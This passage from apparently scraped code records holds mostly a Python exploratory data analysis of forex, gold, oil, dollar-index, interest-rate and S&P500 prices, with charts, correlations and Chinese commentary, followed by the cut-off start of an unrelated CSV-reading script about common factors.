(XAUEUR) :\", len(xau_eur_df))\n\n\n# Merging all the Dataframes together\nmerge_df = pd.merge(daily_eurusd_df, xau_usd_df, how=\"outer\", on=\"Date\")\nmerge_df = pd.merge(merge_df, xau_eur_df, how=\"outer\", on=\"Date\")\n# Re-Formatting Dataframe\nmerge_df.dropna(inplace=True)\nmerge_df = merge_df[::-1].reset_index()\ndel merge_df[\"index\"]\n# Removes Commas from Columns we need\nmerge_df[\"XAUUSD_Price\"] = remove_comma(merge_df, \"XAUUSD_Price\")\nmerge_df[\"XAUEUR_Price\"] = remove_comma(merge_df, \"XAUEUR_Price\")\n# Make an archive/copy of the original dataframe\n_merge_df = merge_df.copy()\n\n\n#%% Statistics\n\"\"\"Mean Price\"\"\"\n\nmean_eurusd = merge_df[\"EURUSD_Price\"].mean()\nmean_xauusd = merge_df[\"XAUUSD_Price\"].astype(float).mean()\nmean_xaueur = merge_df[\"XAUEUR_Price\"].astype(float).mean()\n\n\n\"\"\"Mode Price\"\"\"\n\nmode_eurusd = merge_df[\"EURUSD_Price\"].mode().tolist()\nmode_xauusd = merge_df[\"XAUUSD_Price\"].mode().astype(float).tolist()\nmode_xaueur = merge_df[\"XAUEUR_Price\"].mode().astype(float).tolist()\n\n\n\"\"\"Plotting Candlestick Graphs with Mean and Mode Values\"\"\"\n\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['EURUSD_Open'],\n high=merge_df['EURUSD_High'],\n low=merge_df['EURUSD_Low'],\n close=merge_df['EURUSD_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_eurusd:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_eurusd, mean_eurusd])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"EURUSD 
Chart\")\n\nfig.show()\nprint(\"Mean EURUSD Price (Jan 2014 - Feb 2021) :\", round(mean_eurusd, 4))\nprint(\"Mode EURUSD Price(s) (Jan 2014 - Feb 2021) :\", mode_eurusd)\nmypltly.plot_on_webpage(fig)\n\n#%%\n# Overview of Data\nsns.displot(merge_df['EURUSD_Price'])\n\n\"\"\"\nSkewness is a measure of the symmetrical nature of data. \nKurtosis is a measure of how heavy-tailed or light-tailed the data is relative to a normal distribution.\n\"\"\"\nprint(\"Skewness: %f\" % merge_df['EURUSD_Price'].skew())\nprint(\"Kurtosis: %f\" % merge_df['EURUSD_Price'].kurt())\nplt.show()\n\n#%% Data Exploration\n# 货币强度与黄金的关系\n# 货币强度经常被用作辅助交易的指标。然而,有许多方法来定义货币的强度。一些可用的开源货币强度表测量每种货币相对于美元的强度,然后对主要货币对进行相应排名。由于美元的影响很大,因此美国发生的事件的影响也更大,这对货币强度的看法更加偏颇。例如,澳元兑美元的上涨并不一定意味着澳元的改善,而可能是美国正在发生的负面的基本面变化。因此,我们必须避免使用其他货币作为衡量货币强度的标准。\n# 也许从黄金的角度看货币,可以提供一个不太偏颇的货币强度前景。在本节中,我们看一下欧元/美元与黄金的货币强势有多密切相关。\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['XAUUSD_Open'],\n high=merge_df['XAUUSD_High'],\n low=merge_df['XAUUSD_Low'],\n close=merge_df['XAUUSD_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_xauusd:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_xauusd, mean_xauusd])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"XAUUSD Chart\")\n\nfig.show()\nprint(\"Mean XAUUSD Price (Jan 2014 - Feb 2021) :\", round(mean_xauusd, 2))\nprint(\"Mode XAUUSD Price(s) (Jan 2014 - Feb 2021) :\", mode_xauusd)\nmypltly.plot_on_webpage(fig)\n\n\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['XAUEUR_Open'],\n high=merge_df['XAUEUR_High'],\n low=merge_df['XAUEUR_Low'],\n close=merge_df['XAUEUR_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_xaueur:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_xaueur, mean_xaueur])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"XAUEUR Chart\")\n\nfig.show()\nprint(\"Mean XAUEUR Price (Jan 2014 - Feb 2021) :\", round(mean_xaueur, 2))\nprint(\"Mode XAUEUR Price(s) (Jan 2014 - Feb 2021) :\", mode_xaueur)\nmypltly.plot_on_webpage(fig)\n\n#%%\n# Finding the Difference Between XAUUSD and XAUEUR\nmerge_df[\"XAUUSD_XAUEUR_Diff_Price\"] = (merge_df[\"XAUUSD_Price\"].astype(float) - merge_df[\"XAUEUR_Price\"].astype(float))\nmerge_df[\"XAUEUR / XAUUSD Price\"] = (merge_df[\"XAUUSD_Price\"].astype(float) / merge_df[\"XAUEUR_Price\"].astype(float))\n\n# EUR and USD Currency Strength is taken as (XAUEUR - XAUUSD) in this case\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# 用 XAUUSD_XAUEUR_Diff_Price 表示 EUR和USD的货币强度.\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"EUR and USD Currency Strength\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EUR/USD\"),\n 
secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"EUR/USD Versus EUR and USD Currency Strength\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"EUR and USD Currency Strength\", secondary_y=False)\nfig.update_yaxes(title_text=\"EUR/USD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\nprint(\"Correlation Between Currency Strength of EUR and USD (XAUEUR - XAUUSD) and EUR/USD :\", round(stats.pearsonr(merge_df.XAUUSD_XAUEUR_Diff_Price, merge_df.EURUSD_Price)[0],4))\n# 我们可以看到欧元和美元的货币强度与欧元/美元价格密切相关。从2015年开始,它们的走势甚至似乎是相互同步的。\n\n#%% 市场间关系[商品]\n# 长期以来,黄金和石油等大宗商品一直是货币的衡量标准,无论是通过直接影响货币价格的手段,还是通过其与利率的相关性,似乎大宗商品在衡量外汇市场的未来走势中发挥了至关重要的作用。让我们看看黄金和石油与我们手头的一些数据的相关性.\n# Oil Dataframe\noil_df = myMT5Pro.getsymboldata(\"XTIUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\noil_df.rename(columns = {'Close' : 'Oil_Price', 'Tick_volume' : 'Oil_Volume', \"Open\": \"Oil_Open\", \"High\":\"Oil_High\", \"Low\":\"Oil_Low\"}, inplace=True)\noil_df = oil_df[::-1].reset_index()\n# del oil_df[\"index\"]\noil_df = oil_df[712:]\noil_df[\"Date\"] = oil_df[\"Time\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\noil_df.reset_index()\n\n# Gold Dataframe\ngold_prices_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\ngold_prices_df.rename(columns={\"Time\":\"Date\", \"Close\": \"Gold_Price\"}, inplace=True)\ngold_prices_df[\"Date\"] = gold_prices_df[\"Date\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\ngold_prices_df = gold_prices_df.dropna()\n# us_interest_rates = us_interest_rates[us_interest_rates['Date'].between(\"02/01/2014\", \"08/02/2021\")]\nstart_date = \"02/01/2014\"\nend_date = \"08/02/2021\"\ngold_prices_df = gold_prices_df[gold_prices_df[gold_prices_df.Date==(start_date)].index[0] : gold_prices_df[gold_prices_df.Date==(end_date)].index[0]+pd.to_timedelta(1, unit='D')].reset_index()\n\n# USDX Dataframe\nusd_index_df = myMT5Pro.getsymboldata(\"USDX.index\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nusd_index_df.rename(columns = {\"Time\":\"Date\",'Close' : 'USDX_Price', \"Open\": \"USDX_Open\", \"High\":\"USDX_High\", \"Low\":\"USDX_Low\", \"Tick_volume\":\"USDX_Vol\", \"Rate\":\"USDX_Change%\"}, inplace=True)\nusd_index_df[\"Date\"] = usd_index_df[\"Date\"].apply(lambda x:x.strftime(\"%d/%m/%Y\"))\n\n# US Interest Rates\nus_interest_rates = pd.read_csv(__mypath__.get_current_workpath() + r\"\\Project_文章调试\\Kaggle\\data\\fed-funds-rate-historical-chart_Mar2021.csv\")\nus_interest_rates.rename(columns={\"date\":\"Date\", \" value\": \"US_Interest_Rates_Value\"}, inplace=True)\nus_interest_rates[\"Date\"] = us_interest_rates[\"Date\"].apply(lambda x:datetime.strptime(x, \"%m/%d/%Y\").strftime(\"%d/%m/%Y\"))\nus_interest_rates = us_interest_rates.dropna()\n# us_interest_rates = us_interest_rates[us_interest_rates['Date'].between(\"02/01/2014\", \"08/02/2021\")]\nstart_date = \"02/01/2014\"\nend_date = \"08/02/2021\"\nus_interest_rates = us_interest_rates[us_interest_rates[us_interest_rates.Date==(start_date)].index[0] : us_interest_rates[us_interest_rates.Date==(end_date)].index[0]+1].reset_index().drop(\"index\", axis=1)\n\n# Merging Dataframe\nmerge_df = pd.merge(merge_df, oil_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, gold_prices_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, usd_index_df, 
how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, us_interest_rates, how=\"left\", on=\"Date\")\nmerge_df[\"Gold/Oil\"] = merge_df[\"Gold_Price\"] / merge_df[\"Oil_Price\"]\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"XAUEUR - XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus XAUEUR - XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUUSD_XAUEUR_Diff Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"XAUEUR / XAUUSD Price\"], name=\"XAUEUR / XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus XAUEUR/XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUEUR/XAUUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%% # 分析黄金\nmerge_df.corr(method='pearson')\ncorr_df = merge_df[[\"Gold_Price\", \"USDX_Price\", \"EURUSD_Price\", \"XAUEUR / XAUUSD Price\", \"XAUUSD_XAUEUR_Diff_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Correlation Heatmap\")\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n#%%\nxau_eur_df.XAUEUR_Price.corr(xau_usd_df.XAUUSD_Price)\n\n# **反常现象**\n# 有趣的是,黄金与欧元兑美元和 XAUUSD/XAUEUR 的相关性只有0.15左右,但与 
XAUEUR-XAUUSD 的相关性为0.58。从图表中,我们可以清楚地看到在以下时期,XAUEUR - XAUUSD和(欧元兑美元和XAUUSD / XAUEUR)之间的差异:\n# 2016年6月 - 2016年12月\n# 2020年3月 - 2021年2月\n# 一般来说,对XAUEUR - XAUUSD的影响比XAUEUR / XAUUSD或欧元/美元的影响要大,因为两个值的减法的影响通常比两个值的除法要大(例如黄金和欧元/美元)。考虑到在这两个时期发生的一些全球事件,很容易理解为什么我们的相关性在两个非常相似的价值之间看到如此大的差异。\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.XAUUSD_XAUEUR_Diff_Price, name=\"XAUEUR - XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus XAUEUR - XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUUSD_XAUEUR_Diff Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"XAUEUR / XAUUSD Price\"], name=\"XAUEUR / XAUUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus XAUEUR/XAUUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"XAUEUR/XAUUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Oil Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%% # 分析油\nmerge_df.corr(method='pearson')\ncorr_df = merge_df[[\"Oil_Price\", \"USDX_Price\", \"EURUSD_Price\", \"XAUEUR / XAUUSD Price\", \"XAUUSD_XAUEUR_Diff_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n# **见解和发现**\n# 
与黄金相比,石油与欧元或美元之间的关系乍一看没有太多的反常之处,还需要讨论。\n# 石油通常与美元呈负相关关系,并与欧元/美元一起移动。由于石油是以美元定价的,而美国又是石油的净进口国,因此很容易看出这两者之间的负相关关系是如何建立的。\n# 当然,石油在其他货币之间也有有趣的相关性。然而,这将在进一步的EDA中讨论,深入探讨影响外汇市场的特定商品/市场/资产。\n\n\n#%% Gold / Oil Ratio\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold Prices Versus Oil Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Oil Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"Gold_Price\", \"Oil_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"Gold and Oil Prices Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n#%%\n# Overview of Data\nsns.displot(merge_df['Gold/Oil'])\nplt.show()\n\nprint(\"Skewness: %f\" % merge_df['Gold/Oil'].skew())\nprint(\"Kurtosis: %f\" % merge_df['Gold/Oil'].kurt())\nprint(merge_df['Gold/Oil'].describe())\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.US_Interest_Rates_Value, name=\"US Interest Rate\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus US Interest Rates\"\n)\n\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"US Interest Rates Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.EURUSD_Price, name=\"EURUSD Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus EURUSD Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"EURUSD Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Gold_Price, name=\"Gold Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus Gold Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Gold 
Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.Oil_Price, name=\"Oil Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus Oil Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"Gold Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df[\"Gold/Oil\"], name=\"Gold/Oil\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDX_Price, name=\"USDX Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"Gold/Oil Prices Versus USDX Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"Gold/Oil Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDX Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"Gold/Oil\", \"US_Interest_Rates_Value\", \"EURUSD_Price\", \"USDX_Price\", \"Gold_Price\", \"Oil_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n# 虽然我们的其他数据与黄金/石油价格似乎没有太多的密切关联,但黄金/石油价格仍然是一个重要的因素,值得关注。\n# 黄金和石油通常被认为是与美元反向的。黄金在危机中起到了 \"避风港 \"的投资作用,而石油与美元的反向关系源于它是以美元定价的,当美元上涨时,购买一桶石油所需的美元就会减少。\n# 注意到它们与美元的反向关系的明显区别,黄金/石油比率使我们能够确定美元价格变动的具体原因/事件。\n\n#%%\n# 风险偏好\n# 在参与市场时,风险管理是必不可少的。许多参与者寻求增加收益,同时试图减少/限制通常带来的下行风险的增加。这通常是以分散投资和选择 \"安全 \"和波动较小的证券的形式出现。\n# 虽然风险管理对于保护个人资产至关重要,但全球风险偏好确实对外汇市场产生了重大影响,无论是直接还是间接。在本节中,我们将探讨如何衡量投资者的风险偏好并分析其对外汇市场的影响**。\n# 波动率指数、股票指数和美元/日元\ndaily_usdjpy_df[\"Date\"] = modify_datetime(daily_usdjpy_df)\n# vix_df[\"Date\"] = modify_datetime(vix_df)\nsnp_500_df[\"Date\"] = modify_datetime(snp_500_df)\n\ndaily_usdjpy_df.rename(columns = {'Close' : 'USDJPY_Price', \"Open\": \"USDJPY_Open\", \"High\":\"USDJPY_High\", \"Low\":\"USDJPY_Low\", \"Change %\":\"USDJPY_Change %\"}, inplace=True)\n# vix_df.rename(columns = {'Price' : 'VIX_Price', \"Open\": \"VIX_Open\", \"High\":\"VIX_High\", \"Low\":\"VIX_Low\", \"Change %\":\"VIX_Change %\"}, inplace=True)\nsnp_500_df.rename(columns = {'Close' : 'S&P500_Price', \"Open\": \"S&P500_Open\", \"High\":\"S&P500_High\", \"Low\":\"S&P500_Low\", \"Change %\":\"S&P500_Change %\"}, inplace=True)\n\nmerge_df = pd.merge(merge_df, daily_usdjpy_df, how=\"left\", on=\"Date\")\n# merge_df = pd.merge(merge_df, vix_df, how=\"left\", on=\"Date\")\nmerge_df = pd.merge(merge_df, snp_500_df, how=\"left\", on=\"Date\")\nmerge_df[\"S&P500_Price\"] = merge_df[\"S&P500_Price\"].astype(str)\n# merge_df[\"S&P500_Price\"] = remove_comma(merge_df, \"S&P500_Price\")\nmerge_df[\"S&P500_Price\"] = merge_df[\"S&P500_Price\"].astype(float)\n\n#%%\n# Create figure with secondary y-axis\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n# Add traces\nfig.add_trace(\n go.Scatter(x=merge_df.Date, 
y=merge_df[\"S&P500_Price\"], name=\"S&P500 Price\"),\n secondary_y=False,\n)\nfig.add_trace(\n go.Scatter(x=merge_df.Date, y=merge_df.USDJPY_Price, name=\"USDJPY Price\"),\n secondary_y=True,\n)\n\n# Add figure title\nfig.update_layout(\n title_text=\"S&P500 Prices Versus USDJPY Prices\"\n)\n\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"S&P500 Prices\", secondary_y=False)\nfig.update_yaxes(title_text=\"USDJPY Prices\", secondary_y=True)\n\nfig.show()\nmypltly.plot_on_webpage(fig)\n\n#%%\nmerge_df.corr(method='pearson')\n\n# Adjust Correlation Dataframe\ncorr_df = merge_df[[\"S&P500_Price\", \"USDJPY_Price\"]]\n\n# Correlation Heatmap\ncorrmat = corr_df.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nax.set_title(\"S&P500 / USDJPY Prices Correlation Heatmap\")\n\nsns.heatmap(corrmat, square=True, annot=True)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MuSaCN/PythonProjects2023-02-14","sub_path":"Project_Kaggle/5. Forex EDA.py","file_name":"5. Forex EDA.py","file_ext":"py","file_size_in_byte":33570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"33093185756","text":"from csv import reader\n\n\ndef stringToInteger():\n \"\"\"\n This function open a cvs file and return a list of integer.\n :return:\n \"\"\"\n arq = open(\"problem315.csv\")\n l1 = reader(arq, delimiter=\" \")\n l1 = list(l1)\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n l1[i][k] = int(l1[i][k])\n print(l1)\n return l1\n\n\ndef countTheCommonFactors(l1):\n \"\"\"\n This function take a parameter given by the function above and\n returns for each pair of numbers all common factors produced by\n iterating of the data.\n :param 